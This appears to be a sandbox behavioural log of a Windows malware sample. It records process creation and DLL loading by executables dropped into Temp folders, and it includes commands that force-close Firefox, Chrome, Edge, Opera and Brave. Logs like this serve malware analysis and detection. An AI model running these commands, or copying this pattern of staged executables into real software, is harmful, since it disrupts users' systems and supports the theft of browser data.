                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ieframe.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mlang.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ieframe.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
